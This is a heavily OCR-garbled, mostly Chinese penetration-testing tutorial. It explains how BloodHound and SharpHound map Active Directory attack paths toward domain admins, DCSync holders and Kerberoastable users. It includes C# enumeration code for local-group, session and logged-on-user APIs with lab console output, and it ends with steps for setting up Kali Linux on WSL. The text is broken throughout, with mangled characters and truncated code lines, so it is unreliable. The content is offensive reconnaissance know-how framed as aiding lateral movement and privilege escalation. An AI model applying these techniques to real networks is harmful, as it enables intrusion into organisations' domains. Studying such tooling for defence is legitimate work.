ADMINISTRATOR@t ees 


出 现 该 关系 的 释义 
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— ^  ENTERPRISEADMINSG.- Ш x 


` 


查找 所 有 域 管理 员 










查找 域 管理 员 的 最 短路 径 
查找 具有 DCSync 权 限 的 主体 
具有 外 域 组 成 员 身份 的 用 户 


具有 外 域 组 成 员 身份 的 组 


不 受 约束 的 委派 系统 的 最 短 


来 自 Kerberoastable 用 户 的 


已 拥有 权限 最 短路 径 











MemberOf t % P^ 
бу Abuse Inf ҙ5ес Considerations References 
Be ADMINISTRATOR zaa js a member of the group ENTERPRISE 


5 in active directory grant their members any privileges the group itself has. If a group has 
s to another principal, users/computers in the group, as well as other groups inside the group 


rit those permissions. 
Close 


= R го P & о 
` 


价值 目标 的 最 短路 径 举例 进行 分 析 
择 高 价值 目标 的 最 短路 径 Ul 进行 分 析 (选择 其 他 UI 使 用 方式 一 样 ) ， 可 以 重点 关注 用 户 (绿色 
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qo. 9 @— ө: g Ө- 
e 





找到 关键 计算 机 或 者 关键 用 户 时 ， 可 以 右键 设置 最 短路 径 到 此 处 ， 查 询 可 以 获取 该 用 户 权 限 的 路 径 


信息 。 


发 现 从 exchange 计 算 机 可 以 获取 该 用 户 权 限 


= MENGXIANGGINdE ы Ан + 
Node into 

User Info 

Name MENGXIANGBING wu a м 

Display Name - 

Password Last Changed Fri, 31 May 2019 07 15 52 GMT 

Last Logon $21.27 Apr 2019 05 48 26 GMT 

Enabled True 

Email mengxiangbint ML. Gin 

Description 专业 助理 

AdminCount True 

Compromised False 

Cannot Be Delegated False 

ASREP Roastable False 

Sessions 

Sibling Objects in the Same OU 

Reachable High Value Targets. 


Group Membership 

First Degree Group Memberships 
Unrolled Group Membership 
Foreign Group Membership. 
Local Admin Rights 


Execution Privileges 


e ` 
e 
-SRV-EX03 um ш Р Co а 
2e 
ADMINISTRATORQU t NM m. 
{Le ESS Se е . N 
.. N 
-— M 
e € B 
e. g“ "af 
e Eo 
e- e e е-- e 


如 同 这 样 ， 可 以 遍历 默认 提供 的 ui 查询 中 ， 获 取 到 关键 的 用 户 、 计 算 机 以 及 获取 它们 的 相关 路 径 ， 
可 以 很 好 的 辅助 内 网 渗透 中 的 横向 、 纵 向 权限 获取 。 


路 径 设 置 
右键 设置 起 点 终点 ， 


或 者 在 左上 角 填 上 起 点 终点 
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= SRVDCII = 


(oe 


标 选 择 和 API 使 用 


器 有 几 个 独立 的 步骤， 它们 同时 运行 以 收集 图 形 所 需 的 不 同 数据 。 整 体 细 分 分 为 几 类 : 本 地 管 
;组 成 员 关系 ， 会 话 ， 对 象 属性 ，ACL 和 域 信任 。 


ДЕ 理 员 集合 使 用 两 种 不 同 的 方法 完成 ， 具 体 取决 于 是 否 指定 了 隐秘 选项 。 没 有 隐秘 选项 的 本 地 
员 收 集 将 首先 查询 Active Directory 以 获取 计算 机 列表 。 计 算 机 列表 将 传递 给 枚 举 运 行程 序 ， 该 
程序 将 连接 到 每 台 计 算 机 并 执行 以 下 操作 : 

在 端口 445 上 执行 TCP 连 接 以 检查 主机 是 否 处 于 活动 状态 

如 果 主 机 处 于 活动 状态 ， 则 执行 NetLocalGroupGetMembers NETAPI32.aspx) API, 

从 NetLocalGroupGetMembers 调 用 返回 的 数据 并 将 SID 解 析 为 实际 用 户 ， 并 过 滤 掉 本 地 帐户 。 


指定 了 隐秘 集合 ， 则 SharpHound 将 向 域 控制 器 查询 所 有 组 策略 容器 对 象 及 其 对 应 的 
filesyspath 属 性 的 列表 ， 该 属性 指示 实际 组 策略 文件 在 域 控制 器 $ SYSVOL 目 录 中 的 位 置 。 将 
每 个 组 策略 文件 ， 查 找 模式 S-1-5-32-544 Members， 它 指示 本 地 Administrators 组 。 处 理 文 
确定 应 用 这 些 GPO 的 计算 机 。 
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NET API STATUS NET API FUNCTION 


参数 


Servername 


指向 常量 字符 串 的 指针 ， 该 字符 串 指 定 要 在 其 上 执行 函数 的 远程 服务 器 的 DNS 或 NetBIOS 名 称 。 如 
果 此 参数 为 NULL， 则 使 用 本 地 计算 机 。 


localgroupname 


指向 常量 字符 串 的 指针 ， 该 字符 串 指定 要 列 出 其 成 员 的 本 地 组 的 名 称 。 有 关 更 多 信息 ， 请 参阅 以 下 
备注 部 分 。 


level 


指定 数据 的 信息 级 别 。 此 参数 可 以 是 以 下 值 之 一 。 


1 值 | 含义 | 
| i u aI | 
10 | 返回 与 本 地 组 成 员 关 联 的 安全 行 记 符 (SID) 。 所 述 bufptr 参 数 指向 的 数组 
GR j а F 结构 。 | 
| 4 | A EEDE 信息 。 所 述 bufptr 参 数 指 向 的 数组 
^L 1 结构 。 | 
所 述 bufptr 人 参数 指向 的 数组 
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本 地 组 成 员 的 帐户 和 域名 。 所 述 bufptr 参 数 指向 的 数组 
OUP_MEMBERS_INFO_3 结 构 。 


GroupGetMembers sample code, WHA 
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static class NetworkAPI 


E 
[DllImport("Netapi32.d11")] 
public extern static int NetLocalGroupGetMembers( [MarshalAs (Unmana 
[Dllimport("Netapi32.d11")] 
public extern static int NetApiBufferFree(IntPtr Buffer); 
// LOCALGROUP MEMBERS INFO 1 - Structure for holding members details 
[StructLayout(LayoutKind.Sequential, CharSet - CharSet.Unicode)] 
public struct LOCALGROUP MEMBERS INFO 1 
í 
public int lgrmii sid; 
public int 19гті1 sidusage; 
public string 19гті1 name; 
} 
} 


static void Main(string[] args) 


int EntriesRead; 


int TotalEntries; 


int Resume; 





IntPtr bufPtr; 
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string groupName = "Administrators"; «^ ^ ОТ > 


NetworkAPI.NetLocalGroupGetMembers(null, groupName, 1, out bufPtr, - 


if (EntriesRead » 0) 


NetworkAPI.LOCALGROUP MEMBERS INFO 1[] Members = new NetworkAPI. 


IntPtr iter - bufPtr; 


for (int i = 0; i < EntriesRead; і++) 


( 
Members[i] = (NetworkAPI.LOCALGROUP MEMBERS INFO 1)Магвһа1.Ғ 
iter = (IntPtr)((int)iter + Marshal.SizeOf(typeof(NetworkAPI 
Console.WriteLine(Members[i].lgrmii name); 

} 


NetworkAPI.NetApiBufferFree(bufPtr); 
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Microsoft Windows [HP 6.1.7601] 


版 权 所 有 <c> 2009 Microsoft Corporation 保留 所 有 权利。 


administrators 


管理 员 对 计算 机 7 域 有 不 受 限 制 的 完全 访 占 梭 


fidministrator 


命令 成 功 完成 。 


С: Users Administrator>C: Wsers Administrator \Desktop\Conso 1ейрр22 .exe 


ap?ConsoleAppZ2. exe 
қатады 


C:\Users\Administrator\Desktop 


NetLocalGroupGetMembers 函 数 检 索 安 全 数据 库 中 特定 的 本 地 组 ， 它 从 安全 帐户 管理 器 (SAM) 
数据 库 ， 或 在 域 控 制 器 上 〈 在 Active Directory) 枚 举 成 员 名 单 。 本 地 组 成 员 可 以 是 用 户 或 全 局 组 。 
也 就 是 说 ， 在 非 域 控 的 机 器 下 枚 举 只 能 是 本 地 组 用 户 ， 在 域 控 下 运行 可 以 枚 举 本 地 组 或 者 全 局 组 

(需要 在 域内 使 用 ， 如 果 是 工作 组 ， 无 法 获取 远程 计算 机 的 成 员 组 用 户 ， 只 能 获取 本 地 成 员 组 用 

户 ) 


通过 遍历 DNS 或 者 NetBIOS 名 称 便 可 以 获取 所 有 机 器 的 特定 本 地 组 的 用 户 名 


C:\Users\exchangde、\Desktob2C:\UsekhrsNexchange\DesktopNConsolenhpbp24.exe 
192.168.239.131 administrators 组 : 
WIN-UIUC36T9913\Administrator 
WIN-ULUC36T9913\test 
WIN-UIUC36T9913\admin 
DCLAB2619\Domain Admins 
192.168.239.136 adninistratorsffH. 
DCLAB2619 Administrator 
DCLAB2@19\Enterprise Admins 
DCLAB2G19\Domain Admins 
192.168.239.137 adninistrators?H: 
DMZ—-EXCHANGE\Administrator 
DCLAB2Z@19?\Domain Admins 
DCLAB2619\exchange 

DCLAB2Z619 \Organization Management 
DCLAB2@19\Exchange Trusted Subsystem 


扩展 思路 
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Bre 
Я 可 以 作为 爆破 使 用 。 
域 控 机 器 。 


定 隐 秘 ， 会 话 集合 都 是 相同 的 。BloodHound 公 开 了 两 种 不 同 的 查询 计算 机 会 话 信息 的 方 
都 从 检查 端口 445 开 始 ， 然 后 发 散 。 


本 方法 使 用 NetsessionEnum Ni .asp) 调 用 。 它 不 允许 直接 查询 系统 以 询问 谁 
反 ， 它 允许 查询 系统 以 确定 为 该 系统 建立 的 网 络 会 话 以 及 从 何 处 访问 。 在 访问 网 络 资源 
HS) 时 创建 网 络 会 话 。 


是 供 有 关 在 服务 器 上 建立 的 会 话 的 信息 。 


ШЕРІ STATUS NET АРІ FUNCTION 


servername, 


BER username, 
+ 

DWORD level, 
Ж ЕТТЕ *bufptr, 


! DWORD orefmaxl« 


D. 


E EPDWORD enti 
BULPDWORD totaler 


BEÉEPDWORD resume hand] 


р; 


NU 
-+ 


Servername 
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指向 字符 串 的 指针 ， 该 字符 串 指 定 要 在 其 上 执行 函数 的 远程 服务 器 的 DNS 或 NetBIOS 名 称 。 如 果 此 
参数 为 NULL， 则 使 用 本 地 计算 机 。 


UncClientName 


指向 字符 串 的 指针 ， 该 字符 串 指 定 要 为 其 返回 信息 的 计算 机 会 话 的 名 称 。 如 果 此 参数 为 NULL ， 则 
NetSessionEnum 将 返回 服务 器 上 所 有 计算 机 会 话 的 信息 。 


username 


指向 字符 串 的 指针 ， 该 字符 串 指 定 要 为 其 返回 信息 的 用 户 的 名 称 。 如 果 此 参数 为 NULL， 则 
NetSessionEnum 将 返回 所 有 用 户 的 信息 。 


level 

指定 数据 的 信息 级 别 。 此 参数 可 以 是 以 下 值 之 一 。 

| f2| BX | 

ow 人 | 

| 0 | 返回 建立 会 笑 的 计算 机 的 名 称 。 所 述 bufptr 参 数 指向 的 数组 Si | 结构 。 | 


|1 | 返回 计算 机 的 名 称 ， 用 户 的 名 称 以 及 打开 计算 机 上 的 文件 ， 管 道 和 设备 。 所 述 bufptr 参数 指向 
的 数组 SES 结构 。 | 


121 除 了 为 级 别 1 指 示 的 信息 之 外 ， 还 返回 客户 端的 类 型 以 及 用 户 如 何 建立 会 话 。 所 述 bufptr 参 数 指 
向 的 数组 结构 。 | 


| 10 | 返回 计算 机 的 名 称 ， 用 户 的 名 称 以 及 会 话 的 活动 和 空闲 时 间 。 所 述 bujptr 参 数 指向 的 数组 


结构 。 | 
| 502 | 返回 计算 机 的 名 称 ; 用 户 名 ; 打开 计算 机 上 的 文件 ， 管 道 和 设备 ; 以 及 客户 端正 在 使 用 的 传输 
的 名 称 。 所 述 bufptr 参 数 指向 的 数组 SESSION INI 结构 。 | 


例如 ，API 调 用 可 以 像 这 样 运行 : 


NetSessionEnum("primary.testlab.local", null, null, 10, out IntPtr ptrInfo, -1, 


> 


API 调 用 的 第 四 个 参数 是 API 调 用 的 级 别 ， 其 中 10 是 唯一 以 未 经 身份 验证 的 方式 为 BloodHound 提 供 
所 需 数据 的 级 别 。 (级 别 1[、2 需 要 administrators 或 者 Server Operators 本 地 组 的 成 员 身份 ) 。 因 
此 ， 使 用 该 函数 时 不 需要 高 权限 。 


对 具有 已 安装 的 共享 驱动 器 的 域 控制 器 运行 此 操作 将 显示 类 似 于 以 下 的 结果 : 
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| - 192.168.1.10 


- rvazarkar 


|. o time Lbs 


ame 参 数 指示 ， 其 中 会 话 是 从 哪里 来 的 ， 所 以 主机 名 可 以 让 我 们 的 会 话 到 远程 主机 相关 
池 址 。 这 通常 是 您 可 能 看 不 到 已 知 存在 的 登录 会 话 的 原因 。 如 果 外 部 网 络 会 话 不 存在 ， 

jnd 的 未 经 身份 验证 的 收集 方法 无 法 枚 举 此 数据 。 同 样 重要 的 是 要 注意 ，username 参 数 
联 的 域 ， 这 意味 着 会 话 信息 包含 涉及 猜测 的 元 素 。SharpHound 使 用 全 局 编 录 来 尝试 消 

的 冲突 ， 并 确定 哪个 域 是 正确 的 域 ， 但 不 能 保证 它 会 选择 正确 的 域 。 


获取 主要 通过 域 控 及 共享 


ionEnum sample code 
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” 
public static SESSION INFO 10[] EnumSessions(string server) 


IntPtr BufPtr; 

int res = 0; 

Int32 er - 0, tr - 0, resume - 0; 

BufPtr = (IntPtr)Marshal.SizeOf(typeof(SESSION INFO 10)); 
SESSION INFO 10[] results = new SESSION INFO 10(0); 


do 





res - NetSessionEnum(server, null, null, 10, out BufPtr, -1, ref 
results = new SESSION INFO 10(ег|; 


if (res -- (int)NERR.ERROR MORE DATA || res -- (int)NERR.NERR St 


( 
Int32 p - BufPtr.ToInt32(); 
for (int i = 0; i < ег; it) 
{ 
SESSION_INFO_10 si = (SESSION_INFO_10)Marshal.PtrToStruc 
results[i] = si; 
p += Marshal.SizeOf(typeof(SESSION INFO 10)); | 
) 
F 


Marshal.FreeHGlobal(BufPtr); 
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while (res -- (int)NERR.ERROR MORE DATA); 


return results; 


Users \exchange >C: NJsersNexchangeNDesktopNConsoleñppi.exe 192.168.239.136 
ssionEnum { : 
Username Host i idle time 
change ‘192.168.239.137 £ ø 


‘:\Users s\exc hange >C: NUsers \exchange \WDesktop\ConsolefAppi .exe 192.168.239.137 


ionEnum Yë T<; 
name Host time idle time 
CHANGES “УС: : 1] 10040904 3 
Z~EXCHANGES NNE: :11 254 181 
exchange ‘192.168.239.137 a 





扩展 思路 


通过 服务 器 建立 session 信 息 搜集 IP 资 


LoggedOn 会 


该 LoggedOn 收 集 方法 是 通过 询问 是 谁 在 对 系统 实际 登录 的 计算 机 返回 会 话 信息 的 更 精确 的 收集 方 
法 。 需 要 注意 的 是 ， 此 级 别 的 集合 需要 您 要 从 中 收集 数据 的 主机 的 管理 权限 。 此 会 话 集 非常 适合 防 
御 者 ， 或 在 获得 域 管 理 员 后 进行 其 他 数据 收集 。 该 LoggedOn 收 集 方法 采用 两 种 不 同 的 方法 来 收集 
数据 。 第 一 种 方法 是 使 用 .aspx) API 调 用 。 


该 函数 可 以 列 出 当前 登录 到 该 工作 站 的 所 有 用 户 的 信息 。 此 列表 包括 交互 式 ， 服 务 和 批量 登录 。 


语法 
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参数 


Servername 


指向 字符 串 的 指针 ， 该 字符 串 指定 要 在 其 上 执行 函数 的 远程 服务 器 的 DNS 或 NetBIOS 名 称 。 如 果 此 
参数 为 NULL， 则 使 用 本 地 计算 机 。 





UncClientName 


指向 字符 串 的 指针 ， 该 字符 串 指 定 要 为 其 返回 信息 的 计算 机 会 话 的 名 称 。 如 果 此 参数 为 NULL， 则 
NetSessionEnum 将 返回 服务 器 上 所 有 计算 机 会 话 的 信息 。 


username 


指向 字符 串 的 指针 ， 该 字符 串 指 定 要 为 其 返回 信息 的 用 户 的 名 称 。 如 果 此 参数 为 NULL， 则 
NetSessionEnum 将 返回 所 有 用 户 的 信息 。 


level 
指定 数据 的 信息 级 别 。 此 参数 可 以 是 以 下 值 之 一 。 
| 值 | 含义 | 


| 0 | 返回 建立 会 话 的 计算 机 的 名 称 。 所 述 bufptr 参 数 指向 的 数组 SESSION INFO Off. | 
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i Bu 

















得 机 的 名 称 ， 用 户 的 名 称 以 及 打开 计算 机 上 的 文件 ， 管道 和 设备 。 ‚ш 参数 指向 
SSION “INFO_1 结 构 。 ils | 


E^ 还 返回 客户 端的 类 型 以 及 用 户 如 何 建立 会 话 。 所 述 bufptr 参 数 指 
Sr 结构 。 | 


计算 机 的 名 称 ， 用 户 的 名 称 以 及 会 话 的 活动 和 空闲 时 间 。 所 述 bufptr 参 数 指向 的 数组 
NFO_10 结 构 。 | 


所 述 bufpir 参 数 指向 的 数组 SESSION INFO_502 结 构 。| 
用 的 示例 如 下 : 


WKStaUserEnum("primary,testlab,1ocal"， 1, out IntPtr intPtr, -1, out int entr 


» 


用 的 第 二 个 参数 是 API 调 用 的 级 别 ， 其 中 1 个 返回 的 数据 多 于 0。 对 系统 执行 此 操作 会 产生 如 下 


uii username - rvazarkar 
(011 logon domain - TESTLAB 
uii oth domains - 


kuit logon server - PRIMARY 


aUserEnum sample code 
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à * 


ы т” 
public static WKSTA USER INFO 1[] EnumWkstaUser(string server) 


IntPtr Bufptr; 
int nStatus - 0; 


Int32 dwEntriesread - 0, dwTotalentries - 0, dwResumehandle - 60; 


Bufptr - (IntPtr)Marshal.SizeOf(typeof(WKSTA USER INFO 1)); 
WKSTA USER INFO 1[] results = new WKSTA USER INFO 1[0]; 


do 
nStatus = NetwkstaUserEnum(server, 1, out Bufptr, 32768, out dwE 
results = new WKSTA USER INFO i[dwEntriesread]; 


if ((nStatus -- NERR SUCCESS) || (nStatus -- ERROR MORE DATA)) 


if (dwEntriesread > 0) 





( 
IntPtr pstruct - Bufptr; 
for (int i = 9; i « dwEntriesread; 1ї++) 
t 
WKSTA USER INFO 1 wuii = (WKSTA USER INFO 1)Marshal. 
results[i] = wuil; 
pstruct = (IntPtr)((int)pstruct + Marshal.SizeOf(tyr 
} 
} 
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else 


{ 
//Console.WriteLine("A system error has occurred Жур 
} 
} 
if (Bufptr != IntPtr.Zero) 


NetApiBufferFree(Bufptr); 


) while (nStatus == ERROR MORE DATA); 


return results; 


С: Users \exchange >C: Wsers \exchange \Desktop\SharpDomainSession.exe 192.168.239.1 


[+] NetUkstaUserEnum “БС: 
[lx] Username Logon_server 


domains 


Logon_domain Oth 


[>] Administrator DCLAB-DCO01 DCLAB2019 


[>] DCLAB-pC@1$ DCLAB2619 


C: Users Nexchange?,, 





LoggedOn 集 合 方法 使 用 的 辅助 枚 举 方法 是 使 用 远程 注册 表 。SharpHound 将 尝试 打开 远程 注册 表 的 
用 户 配置 单元 (如 果 已 启用 ) ， 并 将 查找 与 SID 格式 匹配 的 子 项 ， 这 些 对 应 于 登录 用 户 将 获取 的 
SID 转换 成 用 户 名 即 可 。 一 般 来 说 ， 需 要 域 管 权限 去 操作 ， 而 在 极 少 数 情 况 下 ， 无 需 管理 员 权限 即 


可 访问 此 数据 。 


Reg sample code 
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è * 


ë » 
private static IEnumerable<string> GetRegistryLoggedOn(string server) 


var users = new List<string>(); 


try 

// 远程 打开 注册 表 配 置 单 元 ， 如 果 它 不 是 我 们 当前 的 配置 单元 

RegistryKey key = RegistryKey.OpenRemoteBaseKey(RegistryHive.Users, server); 
// 找到 与 我 们 的 正则 表达 式 匹 配 的 所 有 子 项 

var filtered = key.GetSubKeyNames().Where(sub => SidRegex.IsMatch(sub)); 


foreach (var subkey in filtered) 


users.Add(subkey); 


catch (Exception) 


yield break; 


foreach (var user in users.Distinct()) 


yield return user; 
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由 成 员 资格 集合 都 通过 LDAP 完 成 。SharpHound 将 向 域 控制 器 询问 域 中 每 个 组 ， 用 户 和 计算 
列表 ， 并 使 用 MemberOf 属 性 来 解析 组 成 员 身份 。 组 成 员 关系 集合 不 需要 触及 域 控制 器 以 


fa 系统 。 


对 象 ACL 集 合 都 是 通过 LDAP 完 成 的 。SharpHound 将 向 域 控制 器 询问 域 中 每 个 用 户 ， 组 ， 
[和 域 对 象 的 列表 ， 并 使 用 NTSecurityDescriptor 属 性 来 解析 访问 控制 列表 。 ACL 集 合 不 需要 
控制 器 以 外 的 任何 系统 。 


.aspx) API 调 用 执行 。 运 行 此 查询 的 示例 : 
numerateDomainTrusts("testlab.local", 63, out IntPtr ptr, out int domainCount 


和 参数 是 一 组 标志 ， 用 于 指定 要 返回 的 信任 类 型 。63 对 应 于 所 有 可 能 的 标志 : 
28 DOMAIN IN FOREST 

95 DOMAIN DIRECT, OUTBOUND 

D _DOMAIN_TREE_ROOT 

DS DOMAIN. PRIMARY 

DS DOMAIN NATIVE MODE 

DS DOMAIN DIRECT. INBOUND 

区 回 所 有 可 能 的 域 类 型 

性 

属性 集合 都 通过 LDAP 完 成 。SharpHound 将 向 域 控制 器 询问 域 中 每 个 用 户 和 计算 机 对 象 的 列 
4 为 每 个 对 象 请 求 几 个 不 同 的 属性 。 

用 户 对 象 ， 使 用 以 下 属性 : 

SamAccountName 

DistinguishedName 


SaMAccountType 
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e PwdLastSet 


* LastLogon 


SidHistory 


UserAccountControl 
* Mail 


。 ObjectSid 


ServicePrincipalName 


DisplayName 

对 于 计算 机 对 象 ， 使 用 以 下 属性 : 
e SaMAccountName 

。 DistinguishedName 


“ SaMAccountType 


ObjectSid 


UserAccountControl 


DNSHostName 


OperatingSystemServicePack 


OperatingSystem 


每 种 收集 方法 的 目标 是 什么 系统 ? 


4 --”- SharpHound 使 用 的 默认 收集 方法 非常 粗暴 ， 触 及 
可 到 达 的 域 上 的 每 个 系统 。 使 用 隐形 标志 可 显 着 降低 目标 系统 的 数量 。 


本 地 管理 员 - 非 隐秘 


没有 隐秘 标志 的 本 地 管理 员 集合 将 覆盖 每 个 可 到 达 的 域 计 算 机 以 收集 数据 。 这 提供 了 可 靠 和 准确 的 
结果 。 


本 地 管理 员 - 隐秘 


具有 隐秘 标志 的 本 地 管理 员 集合 完全 依赖 于 组 策略 设置 ， 并 且 不 需要 和 触摸 除 SYSVOL 文 件 夹 中 包含 

相关 文件 的 域 控制 器 之 外 的 任何 系统 。 隐 秘 收集 返回 的 数据 质量 因 域 而 异 ， 因 为 某 些 域 不 使 用 GPO 

来 管理 本 地 管理 员 设置 ， 而 其 他 域 则 仅 使 用 它 。GPO 不 会 反映 所 做 的 本 地 更 改 ， 因 此 使 用 此 方法 将 
无 法 找到 添加 到 本 地 管理 员 组 的 其 他 原则 。 
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ke 
£ - 非 隐秘 


入 秘 标志 的 会 话 集合 将 覆盖 每 个 可 到 达 的 域 计算 机 以 收集 数据 。 















隐秘 标志 的 会 话 集合 极 大 地 限制 了 用 于 收集 的 系统 的 数量 。SharpHound 将 使 用 LDAP 中 的 

егі ccountControl 属 性 将 所 有 标记 为 域 控制 器 的 计算 机 作为 目标 。 还 将 请 求 具 有 任何 
meDirectory，ScriptPath 或 ProfilePath 属 性 集 的 所 有 Active Directory 对 象 的 列表 。 从 这 些 属性 
于 二 组 唯一 的 服务 器 名 称 ， 以 标识 会 话 收集 的 其 他 目标 。 平 均 而 言 ， 隐 形 会 话 收集 将 收集 域 中 约 
60% 的 会 话 信息 。 这 可 能 会 因 域 的 结构 而 异 ， 但 大 多 数 网 络 会 话 通常 指向 域 控制 器 或 文件 服务 


A- 隐秘 与 非 隐秘 


集合 仅 需 要 与 域 控制 器 通信 以 请 求 LDAP 数 据 。 


ACL - 隐秘 和 非 隐秘 


ACL 集 合 仅 需要 与 域 控制 器 通信 以 请 求 LDAP 数 据 。 


信任 关系 - 隐秘 和 非 隐秘 


信任 收集 需要 与 映射 的 每 个 域 中 的 一 个 域 控制 器 进行 通信 。 


.aspx) | All Computers | Domain Controllers + “Share Servers" | 





| Session | Net 
| LocalGroup | Modified dGroupGetMiembers.aspx) | All Computers | GPO Files | 


4 | Group | Ldap | All User, Group, and Computer Objects | All User, Group, and Computer Objects | 
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| Trusts | DsEnumerateDor “215742112 аврх) | All Domain and TrustedDomain objects. 
All Domain and TrustedDomain objects | 






| LoggedOn | NetWkstalserEnum NETAPI32.aspx) + Remote Registry | All Computers | Domain 
Controllers + "Share Servers" | 


| ACL | Ldap | All user, group, computer, and domain objects | All user, group, computer, and 
domain objects | 


| ObjectProps | Ldap | All user and computer objects | All user and computer objects | 


| API Call | Protocol | Port | RPC Interface UUID | Named Pipe | RPC Method | 


| .aspx) | [MS-SRVS]: Server Service Remote Protocol | TCP 445 | 4B324FC8- 


1670-01D3-1278-5A47BF6EE188 | PIPEsrvsvc | | 
| NetWkst E .aspx) | [MS-WKST]: Workstation Service Remote Protocol | TCP 445 | 
6BFFD098-A112-3610-9833-46C3F87E345A | PIPEwkssve | «civ Enum | 
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r: ai 


ndows 10 配置 措 建 Kali 环 境 第 一 季 


Dv Subsystem for Linux (简称 WSL) 是 一 个 在 Windows 10 上 能 够 运行 原生 Linux 二 进 制 可 执 
Jk (Е.Р) 的 兼容 层 。 它 是 由 微软 与 Canonical 公 司 合作 开发 ，WSL 提 供 了 一 个 微软 开发 的 
x 兼容 内 核 接口 (不 包含 Linux 代 码 ) ， 该 子 系统 不 能 运行 所 有 Linux 软 件 ， 例 如 那些 图 形 用 户 界 
以 及 那些 需要 未 实现 的 Linux 内 核 服务 的 软件 。 不 过 ， 这 可 以 用 在 外 部 X 服 务 器 上 运行 的 图 形 X 

idow 系 统 缓解 。 通 过 子 系统 的 搭建 配置 可 以 更 好 的 用 于 网 络 安全 学 习 。 


i dows 10 子 系统 搭建 : 


2 5251126 
| 


启用 "适用 于 Linux 的 Windows 子 系统 ， 虚拟 机 平台 ” 


Win10 任 务 栏 中 的 Cortana 搜 索 框 搜索 打开 “启用 或 关闭 Windows 功 能 "， 向 下 滚动 列表 ， 即 可 看 
适用 于 Linux 的 Windows 子 系统 ”， 虚拟 机 平台 ， 项 。 
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| Windows 功能 | 一 


* 





т 要 关闭 一 种 功能 
EUM. MOSER MERCIA A. 


[] Windows 虚拟 机 监控 程序 平台 
+ [а] ”打印 和 文件 服务 
工作 文件 夹 客户 端 
Г] 简单 TCPIP 服务 ( 即 echo, daytime 等 ) 
+ [| ІНІН 
| 媒体 功能 
mi 容器 
liner Т 









Som Linux 的 prse TR 


二 、 启 用 开发 人 员 模式 
进入 “设置 - 更 新 和 安全 - 针对 开发 人 员 "设置 页 面 ， 选 中 "开发 人 员 模 式 "。 
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ЖАСЫ 





应 用 源 


О Microsoft Store 应 用 
仅 安装 Microsoft Store 的 应 用 。 


O лін 
从 你 信任 的 其 他 来 源 (例如 工作 区 ) 安装 应 用 。 


(€) 开发 人 员 模 式 


0 括 松 散文 件 ) 安 装 应 用 。 





设备 门户 
启用 通过 局 域 网 连接 进行 远程 诊断 的 功能 。 
@ > x 


设备 发 现 


允许 USB 连接 和 本 地 网 络 发 现 你 的 设备 。 
@_)х 


注意 : 这 需要 Windows 10 SDK 版 本 1803 或 更 高 版 本 。 





启用 预览 体验 计划 ， 选 择 模式 " 快 
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(n) EE Uc 


选择 预览 体验 成 员 设 置 


О в (推荐 ) 
可 预览 对 设备 言 风险 最 低 的 Windows 最 新 版 本 。 你 将 以 每 月 
一 次 或 两 次 的 频率 获取 OS 更 新 ， 完 成 更 新 需要 重新 启动 设备 。 


(e B 
可 率先 向 Microsoft {#7 Windows 最 新 预览 版 本 的 反馈 。 
你 将 以 每 周一 次 或 两 次 的 频率 获取 OS BS, SOLS Nee 


parÍHWnx. 
启动 设备 。 





(3 bes Preview 
续 使 用 Windows 零售 版 本 ， 但 可 以 提前 预览 正在 进行 的 应 用 
REM 开发 以 及 其 它 质量 更 新 。 


О 跳 过 


跳 到 下 一 个 Windows 版 本 。 


四 、 启 用 Linux 子 系统 


右键 点 击 Win10 开 始 按钮 ， 选 择 "Windows PowerShell( 管 理 员 )" 以 管理 员 身 份 运行 Windows 
PowerShell. 





Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-L 


> 
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k. 





EE CWINDOWS System32WindowsPowerShell1.Opowershell.exe x 十 м 


wicnosoft corporation。 保 留 所 有 权利 .。 


台 PowerShell https://aka.ms/pscore6 


ers\micro> Enable-WindowsOptionalFeature Microsoft-Windows-Subsystem-Linux 


Users\micro> 





五 、 更 新 wsl2 
为 了 更 好 的 让 子 系统 支持 相关 调用 ， 需 要 更 新 ws|- to 一 一 wsl2， 下 载 并 且 运 行 
http 10 


请 注意 ， 你 需要 运行 Windows 10 build 18917 或 更 高 版 本 才能 使 用 WSL 2 


微软 Windows 10 BH - 


ы 


Bt 
ІН 


а Microsoft 


时 新 后 内 部 版 本 号 (更 新 时 间 为 2019 年 7 月 14 日 ) 
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Windows 规格 


版 本 Windows 10 专业 版 Insider Preview 
版 本 号 1903 

安装 日 期 2019/7/14 

操作 系统 版 本 


序列 号 


[p gp Ie 5 T? xA 
£a rif TT ay Hh , 


验证 是 否 安装 成 功 : 


powershell F 输入 wsl --help， 是 否 有 “--set-default"，“--set-default-version” 等 选项 ， 如 果 有 说 明 更 
新 成 功 。 
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--verbose, -v 


Show detailed information about all distributions. 


.-set default, -5 «Distro» 


Sets the distribution as the default. 


/.--set-default-version «Version» 


Changes the default install version for new distributions. 


= --set-version «Distro» «Version» 


Changes the version of the specified distribution. 


--shutdown 


Immediately terminates all running distributions and the WSL 2 lightweic 


--terminate, -t «Distro» 


Terminates the specified distribution. 


--unregister «Distro» 


Unregisters the distribution. 


--help 


Display usage information. 
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7x. Windows 商城 下 载 并 安装 Kali 子 系统 
下 载 安装 ， 等 待 即 可 ， 需 要 注意 的 是 ， 网 络 稳定 以 及 是 否 被 防火 墙 。 


< 主页 mm 
结果 : kali 


UN „| 设备 支持 on | 
所 有 部 门 个 人 电脑 


应 用 程序 (5) 








AN 


| 














| Kali Linux | Ethical Hacking Master E.K Alive Alphabet: 
ox | Resources at Letter Tracing 
ы | хх ху 

| Age ger 

| | 

| ве | sama RETR (2100 


cmd 下 便 可 直接 输入 kali， 进 入 Kali-linux 子 系统 
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ШИ /home/micropoor X 


c:\Users\micro>kKali 
i cropoor@LAPTOP-RIJMEG6B5:~$ su 
password: 
micropoor cat /etc/issue 
Kali GNU/Linux Rolling Nn M 


micropoor | 





七 、 更 新 Kali-linux 子 系统 
由 于 国内 网 络 对 于 官方 支持 不 友好 ， 故 需 编辑 更 新 源 


deb http://http.kali.org/kali kali-rolling main non-free contrib 

&deb-src http://http.kali.org/kali kali-rolling main non-free contrib 

# 中 科大 

deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 
# 阿 里 云 

deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib 


deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib 
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> micropoor cat /etc/apt/sources.list 


deb http://http.kali.org/kali kali-rolling main non-free contrib 
#deb-src http://http.kali.org/kali kali-rolling main non-free contrib 
# 中 科大 


deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 
